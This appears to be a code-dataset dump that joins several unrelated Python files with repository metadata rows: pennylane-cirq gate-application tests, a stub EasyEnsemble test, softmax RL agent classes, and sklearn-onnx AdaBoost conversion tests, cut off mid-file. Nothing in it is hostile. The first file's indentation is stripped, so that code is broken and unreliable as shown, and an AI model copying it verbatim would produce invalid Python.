] | null | null | null | tests/test_apply.py | PyJedi/pennylane-cirq | 228a083965704271fa163a1cd7c4d4b234027f0f | [
"Apache-2.0"
] | null | null | null | tests/test_apply.py | PyJedi/pennylane-cirq | 228a083965704271fa163a1cd7c4d4b234027f0f | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that application of operations works correctly in the plugin devices"""
import pytest
import numpy as np
import pennylane as qml
from pennylane_cirq import SimulatorDevice, MixedStateSimulatorDevice
from scipy.linalg import block_diag
from conftest import U, U2, A
from contextlib import contextmanager
np.random.seed(42)
# ==========================================================
# Some useful global variables
# non-parametrized qubit gates
I = np.identity(2)
X = np.array([[0, 1], [1, 0]])
Y = np.array([[0, -1j], [1j, 0]])
Z = np.array([[1, 0], [0, -1]])
H = np.array([[1, 1], [1, -1]]) / np.sqrt(2)
S = np.diag([1, 1j])
T = np.diag([1, np.exp(1j * np.pi / 4)])
SWAP = np.array([[1, 0, 0, 0], [0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 1]])
CNOT = np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1], [0, 0, 1, 0]])
CZ = np.diag([1, 1, 1, -1])
toffoli = np.diag([1 for i in range(8)])
toffoli[6:8, 6:8] = np.array([[0, 1], [1, 0]])
CSWAP = block_diag(I, I, SWAP)
# parametrized qubit gates
phase_shift = lambda phi: np.array([[1, 0], [0, np.exp(1j * phi)]])
rx = lambda theta: np.cos(theta / 2) * I + 1j * np.sin(-theta / 2) * X
ry = lambda theta: np.cos(theta / 2) * I + 1j * np.sin(-theta / 2) * Y
rz = lambda theta: np.cos(theta / 2) * I + 1j * np.sin(-theta / 2) * Z
rot = lambda a, b, c: rz(c) @ (ry(b) @ rz(a))
crz = lambda theta: np.array(
[
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, np.exp(-1j * theta / 2), 0],
[0, 0, 0, np.exp(1j * theta / 2)],
]
)
# list of all non-parametrized single-qubit gates,
# along with the PennyLane operation name
single_qubit = [
("PauliX", X),
("PauliY", Y),
("PauliZ", Z),
("Hadamard", H),
("S", S),
("T", T),
]
# list of all parametrized single-qubit gates
single_qubit_param = [("PhaseShift", phase_shift), ("RX", rx), ("RY", ry), ("RZ", rz)]
# list of all non-parametrized two-qubit gates
two_qubit = [("CNOT", CNOT), ("SWAP", SWAP), ("CZ", CZ)]
# list of all parametrized two-qubit gates
two_qubit_param = [("CRZ", crz)]
# list of all three-qubit gates
three_qubit = [("Toffoli", toffoli), ("CSWAP", CSWAP)]
@contextmanager
def mimic_execution_for_apply(device):
device.reset()
with device.execution_context():
yield
@pytest.mark.parametrize("shots,analytic", [(1000, True)])
class TestApplyPureState:
"""Test application of PennyLane operations on the pure state simulator."""
def test_basis_state(self, analytic, shots, tol):
"""Test basis state initialization"""
dev = SimulatorDevice(4, analytic=analytic, shots=shots)
state = np.array([0, 0, 1, 0])
with mimic_execution_for_apply(dev):
dev.apply([qml.BasisState(state, wires=[0, 1, 2, 3])])
res = dev._state
expected = np.zeros([2 ** 4])
expected[np.ravel_multi_index(state, [2] * 4)] = 1
assert np.allclose(res, expected, **tol)
def test_identity_basis_state(self, analytic, shots, tol):
"""Test basis state initialization if identity"""
dev = SimulatorDevice(4, analytic=analytic, shots=shots)
state = np.array([1, 0, 0, 0])
with mimic_execution_for_apply(dev):
dev.apply([qml.BasisState(state, wires=[0, 1, 2, 3])])
res = dev._state
expected = np.zeros([2 ** 4])
expected[np.ravel_multi_index(state, [2] * 4)] = 1
assert np.allclose(res, expected, **tol)
def test_qubit_state_vector(self, init_state, analytic, shots, tol):
"""Test PauliX application"""
dev = SimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0])])
res = dev._state
expected = state
assert np.allclose(res, expected, **tol)
def test_invalid_qubit_state_vector(self, analytic, shots):
"""Test that an exception is raised if the state
vector is the wrong size"""
dev = SimulatorDevice(2, analytic=analytic, shots=shots)
state = np.array([0, 123.432])
with pytest.raises(
qml.DeviceError,
match=r"For QubitStateVector, the state has to be specified for the correct number of qubits",
):
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0, 1])])
@pytest.mark.parametrize("name,mat", single_qubit)
def test_single_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
"""Test application of single qubit gates without parameters"""
dev = SimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply(
[qml.QubitStateVector(state, wires=[0]), qml.__getattribute__(name)(wires=[0]),]
)
res = dev._state
expected = mat @ state
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("theta", [0.5432, -0.232])
@pytest.mark.parametrize("name,func", single_qubit_param)
def test_single_qubit_parameters(self, init_state, analytic, shots, name, func, theta, tol):
"""Test application of single qubit gates with parameters"""
dev = SimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0]),
qml.__getattribute__(name)(theta, wires=[0]),
]
)
res = dev._state
expected = func(theta) @ state
assert np.allclose(res, expected, **tol)
def test_rotation(self, init_state, analytic, shots, tol):
"""Test three axis rotation gate"""
dev = SimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
a = 0.542
b = 1.3432
c = -0.654
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0]), qml.Rot(a, b, c, wires=[0])])
res = dev._state
expected = rot(a, b, c) @ state
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("name,mat", two_qubit)
def test_two_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
"""Test PauliX application"""
dev = SimulatorDevice(2, analytic=analytic, shots=shots)
state = init_state(2)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0, 1]),
qml.__getattribute__(name)(wires=[0, 1]),
]
)
res = dev._state
expected = mat @ state
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("mat", [U, U2])
def test_qubit_unitary(self, init_state, analytic, shots, mat, tol):
N = int(np.log2(len(mat)))
dev = SimulatorDevice(N, analytic=analytic, shots=shots)
state = init_state(N)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=list(range(N))),
qml.QubitUnitary(mat, wires=list(range(N))),
]
)
res = dev._state
expected = mat @ state
assert np.allclose(res, expected, **tol)
def test_invalid_qubit_state_unitary(self, analytic, shots):
"""Test that an exception is raised if the
unitary matrix is the wrong size"""
dev = SimulatorDevice(2, analytic=analytic, shots=shots)
state = np.array([[0, 123.432], [-0.432, 023.4]])
with pytest.raises(ValueError, match=r"Not a unitary matrix"):
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitUnitary(state, wires=[0, 1])])
@pytest.mark.parametrize("name, mat", three_qubit)
def test_three_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
dev = SimulatorDevice(3, analytic=analytic, shots=shots)
state = init_state(3)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0, 1, 2]),
qml.__getattribute__(name)(wires=[0, 1, 2]),
]
)
res = dev._state
expected = mat @ state
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("theta", [0.5432, -0.232])
@pytest.mark.parametrize("name,func", two_qubit_param)
def test_two_qubits_parameters(self, init_state, analytic, shots, name, func, theta, tol):
"""Test application of two qubit gates with parameters"""
dev = SimulatorDevice(2, analytic=analytic, shots=shots)
state = init_state(2)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0, 1]),
qml.__getattribute__(name)(theta, wires=[0, 1]),
]
)
res = dev._state
expected = func(theta) @ state
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("shots,analytic", [(1000, True)])
class TestApplyMixedState:
"""Test application of PennyLane operations on the mixed state simulator."""
def test_basis_state(self, analytic, shots, tol):
"""Test basis state initialization"""
dev = MixedStateSimulatorDevice(4, analytic=analytic, shots=shots)
state = np.array([0, 0, 1, 0])
with mimic_execution_for_apply(dev):
dev.apply([qml.BasisState(state, wires=[0, 1, 2, 3])])
res = dev._state
expected = np.zeros([16])
expected[np.ravel_multi_index(state, [2] * 4)] = 1
expected = np.kron(expected, expected.conj()).reshape([2 ** 4, 2 ** 4])
assert np.allclose(res, expected, **tol)
def test_identity_basis_state(self, analytic, shots, tol):
"""Test basis state initialization if identity"""
dev = MixedStateSimulatorDevice(4, analytic=analytic, shots=shots)
state = np.array([1, 0, 0, 0])
with mimic_execution_for_apply(dev):
dev.apply([qml.BasisState(state, wires=[0, 1, 2, 3])])
res = dev._state
expected = np.zeros([16])
expected[np.ravel_multi_index(state, [2] * 4)] = 1
expected = np.kron(expected, expected.conj()).reshape([16, 16])
assert np.allclose(res, expected, **tol)
def test_qubit_state_vector(self, init_state, analytic, shots, tol):
"""Test PauliX application"""
dev = MixedStateSimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0])])
res = dev._state
expected = state
expected = np.kron(state, state.conj()).reshape([2, 2])
assert np.allclose(res, expected, **tol)
def test_invalid_qubit_state_vector(self, analytic, shots):
"""Test that an exception is raised if the state
vector is the wrong size"""
dev = MixedStateSimulatorDevice(2, analytic=analytic, shots=shots)
state = np.array([0, 123.432])
with pytest.raises(
qml.DeviceError,
match=r"For QubitStateVector, the state has to be specified for the correct number of qubits",
):
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0, 1])])
@pytest.mark.parametrize("name,mat", single_qubit)
def test_single_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
"""Test application of single qubit gates without parameters"""
dev = MixedStateSimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply(
[qml.QubitStateVector(state, wires=[0]), qml.__getattribute__(name)(wires=[0]),]
)
res = dev._state
expected = mat @ state
expected = np.kron(expected, expected.conj()).reshape([2, 2])
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("theta", [0.5432, -0.232])
@pytest.mark.parametrize("name,func", single_qubit_param)
def test_single_qubit_parameters(self, init_state, analytic, shots, name, func, theta, tol):
"""Test application of single qubit gates with parameters"""
dev = MixedStateSimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0]),
qml.__getattribute__(name)(theta, wires=[0]),
]
)
res = dev._state
expected = func(theta) @ state
expected = np.kron(expected, expected.conj()).reshape([2, 2])
assert np.allclose(res, expected, **tol)
def test_rotation(self, init_state, analytic, shots, tol):
"""Test three axis rotation gate"""
dev = MixedStateSimulatorDevice(1, analytic=analytic, shots=shots)
state = init_state(1)
a = 0.542
b = 1.3432
c = -0.654
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitStateVector(state, wires=[0]), qml.Rot(a, b, c, wires=[0])])
res = dev._state
expected = rot(a, b, c) @ state
expected = np.kron(expected, expected.conj()).reshape([2, 2])
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("name,mat", two_qubit)
def test_two_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
"""Test PauliX application"""
dev = MixedStateSimulatorDevice(2, analytic=analytic, shots=shots)
state = init_state(2)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0, 1]),
qml.__getattribute__(name)(wires=[0, 1]),
]
)
res = dev._state
expected = mat @ state
expected = np.kron(expected, expected.conj()).reshape([4, 4])
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("mat", [U, U2])
def test_qubit_unitary(self, init_state, analytic, shots, mat, tol):
N = int(np.log2(len(mat)))
dev = MixedStateSimulatorDevice(N, analytic=analytic, shots=shots)
state = init_state(N)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=list(range(N))),
qml.QubitUnitary(mat, wires=list(range(N))),
]
)
res = dev._state
expected = mat @ state
expected = np.kron(expected, expected.conj()).reshape([2 ** N, 2 ** N])
assert np.allclose(res, expected, **tol)
def test_invalid_qubit_state_unitary(self, analytic, shots):
"""Test that an exception is raised if the
unitary matrix is the wrong size"""
dev = MixedStateSimulatorDevice(2, analytic=analytic, shots=shots)
state = np.array([[0, 123.432], [-0.432, 023.4]])
with pytest.raises(ValueError, match=r"Not a unitary matrix"):
with mimic_execution_for_apply(dev):
dev.apply([qml.QubitUnitary(state, wires=[0, 1])])
@pytest.mark.parametrize("name, mat", three_qubit)
def test_three_qubit_no_parameters(self, init_state, analytic, shots, name, mat, tol):
dev = MixedStateSimulatorDevice(3, analytic=analytic, shots=shots)
state = init_state(3)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0, 1, 2]),
qml.__getattribute__(name)(wires=[0, 1, 2]),
]
)
res = dev._state
expected = mat @ state
expected = np.kron(expected, expected.conj()).reshape([8, 8])
assert np.allclose(res, expected, **tol)
@pytest.mark.parametrize("theta", [0.5432, -0.232])
@pytest.mark.parametrize("name,func", two_qubit_param)
def test_two_qubits_parameters(self, init_state, analytic, shots, name, func, theta, tol):
"""Test application of single qubit gates with parameters"""
dev = MixedStateSimulatorDevice(2, analytic=analytic, shots=shots)
state = init_state(2)
with mimic_execution_for_apply(dev):
dev.apply(
[
qml.QubitStateVector(state, wires=[0, 1]),
qml.__getattribute__(name)(theta, wires=[0, 1]),
]
)
res = dev._state
expected = func(theta) @ state
expected = np.kron(expected, expected.conj()).reshape([4, 4])
assert np.allclose(res, expected, **tol)
| 37.16318 | 106 | 0.599415 | 2,239 | 17,764 | 4.632425 | 0.106297 | 0.060162 | 0.040976 | 0.053027 | 0.85027 | 0.844196 | 0.833398 | 0.82472 | 0.817586 | 0.814211 | 0 | 0.029936 | 0.264749 | 17,764 | 477 | 107 | 37.24109 | 0.764183 | 0.118554 | 0 | 0.721068 | 0 | 0 | 0.026919 | 0 | 0 | 0 | 0 | 0 | 0.059347 | 1 | 0.074184 | false | 0 | 0.020772 | 0 | 0.10089 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
810740ed3447def9a7c885db02ee8c9a7ec35487 | 233 | py | Python | unbalanced_dataset/ensemble/tests/test_easy_ensemble.py | kmike/UnbalancedDataset | 777f26cee73c04ae2f3d59e43c990cbfd1725b23 | [
"MIT"
] | 6 | 2016-06-02T09:27:41.000Z | 2021-04-21T06:46:12.000Z | unbalanced_dataset/ensemble/tests/test_easy_ensemble.py | kmike/UnbalancedDataset | 777f26cee73c04ae2f3d59e43c990cbfd1725b23 | [
"MIT"
] | null | null | null | unbalanced_dataset/ensemble/tests/test_easy_ensemble.py | kmike/UnbalancedDataset | 777f26cee73c04ae2f3d59e43c990cbfd1725b23 | [
"MIT"
] | 1 | 2018-08-25T03:11:05.000Z | 2018-08-25T03:11:05.000Z | """Test the module easy ensemble."""
from __future__ import print_function
from unbalanced_dataset.ensemble import EasyEnsemble
def test_easy_ensemble():
"""Test the easy ensemble function."""
print('Test Easy Ensemble')
| 21.181818 | 52 | 0.755365 | 29 | 233 | 5.793103 | 0.482759 | 0.285714 | 0.190476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150215 | 233 | 10 | 53 | 23.3 | 0.848485 | 0.270386 | 0 | 0 | 0 | 0 | 0.113208 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
811d088cb925985eeeb216526d5f32c94bf7d0eb | 2,659 | py | Python | infinite_horizon_off_policy_estimation/sumo/Easy_agent.py | marued/RL-dualDICE | 4683106679448d258ee4e4137e5f99454c7e3539 | [
"Apache-2.0"
] | null | null | null | infinite_horizon_off_policy_estimation/sumo/Easy_agent.py | marued/RL-dualDICE | 4683106679448d258ee4e4137e5f99454c7e3539 | [
"Apache-2.0"
] | null | null | null | infinite_horizon_off_policy_estimation/sumo/Easy_agent.py | marued/RL-dualDICE | 4683106679448d258ee4e4137e5f99454c7e3539 | [
"Apache-2.0"
] | 1 | 2020-09-20T20:18:03.000Z | 2020-09-20T20:18:03.000Z | import numpy as np
def softmax(x, alpha, beta):
exp = np.exp(alpha * x + beta)
return exp/np.sum(exp)
class Simple_agent(object):
def __init__(self, action_size, alpha, epsilon = 0.04):
self.action_size = action_size
self.alpha = alpha
self.epsilon = epsilon
def get_action(self, state):
state = state.reshape(-1, 4)
'''
for i in range(state.shape[0]):
if np.sum(state[i,:4]) > 1e-3:
state[i, :4] = state[i, :4]/np.sum(state[i,:4])
else:
state[i, :4] += 0.25
'''
action = np.zeros(self.action_size)
for i in range(self.action_size):
if np.random.rand() < self.epsilon:
action[i] = np.random.randint(4)
else:
prob = softmax(state[i,:], self.alpha, 0)
action[i] = np.random.choice(4, p = prob)
return action
def log_pi(self, state, action):
state = state.reshape(-1, 4)
'''
for i in range(state.shape[0]):
if np.sum(state[i,:4]) > 1e-3:
state[i, :4] = state[i, :4]/np.sum(state[i,:4])
else:
state[i, :4] += 0.25
'''
log_pi_action = 0.0
for i in range(self.action_size):
prob = softmax(state[i, :], self.alpha, 0)
prob = (1-self.epsilon) * prob + self.epsilon * 0.25
log_pi_action += np.log(prob[int(action[i])])
return log_pi_action
def pi(self, state, action):
return np.exp(self.log_pi(state, action))
class Easy_agent(object):
def __init__(self, action_size, alpha, beta, gamma, epsilon = 1e-4):
self.action_size = action_size
self.alpha = alpha
self.beta = beta
self.gamma = gamma
self.epsilon = epsilon
def get_action(self, state):
state = state.reshape(-1,8)
for i in range(state.shape[0]):
if np.sum(state[i,:4]) > 1e-3:
state[i, :4] = state[i, :4]/np.sum(state[i,:4])
else:
state[i, :4] += 0.25
action = np.zeros(self.action_size)
for i in range(self.action_size):
if np.random.rand() < self.epsilon:
action[i] = np.random.randint(4)
else:
weight_keep = state[i,4:] * self.gamma
prob = softmax(state[i,:4], self.alpha, weight_keep + self.beta)
action[i] = np.random.choice(4, p = prob)
return action
def log_pi(self, state, action):
state = state.reshape(-1,8)
for i in range(state.shape[0]):
if np.sum(state[i,:4]) > 1e-3:
state[i, :4] = state[i, :4]/np.sum(state[i,:4])
else:
state[i, :4] += 0.25
log_pi_action = 0.0
for i in range(self.action_size):
weight_keep = state[i,4:] * self.gamma
prob = softmax(state[i, :4], self.alpha, weight_keep + self.beta)
prob = (1-self.epsilon) * prob + self.epsilon * 0.25
log_pi_action += np.log(prob[int(action[i])])
return log_pi_action
def pi(self, state, action):
return np.exp(self.log_pi(state, action))
| 28.902174 | 69 | 0.630688 | 462 | 2,659 | 3.534632 | 0.114719 | 0.09553 | 0.102878 | 0.053889 | 0.913656 | 0.913656 | 0.913656 | 0.880588 | 0.835273 | 0.786283 | 0 | 0.03671 | 0.190673 | 2,659 | 91 | 70 | 29.21978 | 0.722119 | 0 | 0 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.132353 | false | 0 | 0.014706 | 0.029412 | 0.279412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4b17bf799478b77f9109ee830bab76e50fe070a | 14,816 | py | Python | tests/test_sklearn_adaboost_converter.py | Alexsandruss/sklearn-onnx | b612557615df439e471867a676c9eca8ae4a787c | [
"Apache-2.0"
] | null | null | null | tests/test_sklearn_adaboost_converter.py | Alexsandruss/sklearn-onnx | b612557615df439e471867a676c9eca8ae4a787c | [
"Apache-2.0"
] | null | null | null | tests/test_sklearn_adaboost_converter.py | Alexsandruss/sklearn-onnx | b612557615df439e471867a676c9eca8ae4a787c | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
import unittest
from distutils.version import StrictVersion
import onnx
from onnx.defs import onnx_opset_version
import onnxruntime
from sklearn.ensemble import AdaBoostClassifier, AdaBoostRegressor
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from skl2onnx import convert_sklearn
from skl2onnx.common.data_types import (
BooleanTensorType,
FloatTensorType,
Int64TensorType,
)
from skl2onnx.common.data_types import onnx_built_with_ml
from test_utils import (
dump_data_and_model,
fit_classification_model,
fit_regression_model,
TARGET_OPSET
)
class TestSklearnAdaBoostModels(unittest.TestCase):
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme_r(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=10, algorithm="SAMME.R", random_state=42,
base_estimator=DecisionTreeClassifier(
max_depth=2, random_state=42)), 3)
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMER",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme_r_decision_function(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=10, algorithm="SAMME.R", random_state=42,
base_estimator=DecisionTreeClassifier(
max_depth=2, random_state=42)), 4)
options = {id(model): {'raw_scores': True}}
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10,
options=options,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMERDecisionFunction",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
methods=['predict', 'decision_function'],
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme_r_logreg(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=5, algorithm="SAMME.R",
base_estimator=LogisticRegression(
solver='liblinear')), 4)
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMERLogReg",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=5, algorithm="SAMME", random_state=42,
base_estimator=DecisionTreeClassifier(
max_depth=6, random_state=42)), 2)
model_onnx = convert_sklearn(
model,
"AdaBoostClSamme",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMEDT",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"< StrictVersion('0.5.0')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_samme_decision_function(self):
model, X_test = fit_classification_model(AdaBoostClassifier(
n_estimators=5, algorithm="SAMME", random_state=42,
base_estimator=DecisionTreeClassifier(
max_depth=6, random_state=42)), 2)
options = {id(model): {'raw_scores': True}}
model_onnx = convert_sklearn(
model,
"AdaBoostClSamme",
[("input", FloatTensorType((None, X_test.shape[1])))],
target_opset=10,
options=options,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierSAMMEDTDecisionFunction",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"< StrictVersion('0.5.0')",
methods=['predict', 'decision_function_binary'],
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_lr(self):
model, X_test = fit_classification_model(
AdaBoostClassifier(learning_rate=0.3, random_state=42), 3,
is_int=True)
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", Int64TensorType((None, X_test.shape[1])))],
target_opset=10
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierLR",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_classifier_bool(self):
model, X_test = fit_classification_model(
AdaBoostClassifier(random_state=42), 3,
is_bool=True)
model_onnx = convert_sklearn(
model,
"AdaBoost classification",
[("input", BooleanTensorType((None, X_test.shape[1])))],
target_opset=10,
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X_test,
model,
model_onnx,
basename="SklearnAdaBoostClassifierBool",
allow_failure="StrictVersion("
"onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor(self):
model, X = fit_regression_model(
AdaBoostRegressor(n_estimators=5))
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=10)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressor-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_lreg(self):
model, X = fit_regression_model(
AdaBoostRegressor(n_estimators=5,
base_estimator=LinearRegression()))
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=10)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorLReg-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_int(self):
model, X = fit_regression_model(
AdaBoostRegressor(n_estimators=5), is_int=True)
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", Int64TensorType([None, X.shape[1]]))],
target_opset=10)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorInt-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
"< StrictVersion('0.5.0') or "
"StrictVersion(onnx.__version__) "
"== StrictVersion('1.4.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
@unittest.skipIf((StrictVersion(onnx.__version__) <
StrictVersion("1.5.0")),
reason="not available")
def test_ada_boost_regressor_lr10(self):
model, X = fit_regression_model(
AdaBoostRegressor(learning_rate=0.5, random_state=42))
model_onnx = convert_sklearn(
model, "AdaBoost regression",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=10)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnAdaBoostRegressorLR-Dec4",
allow_failure="StrictVersion("
"onnxruntime.__version__) "
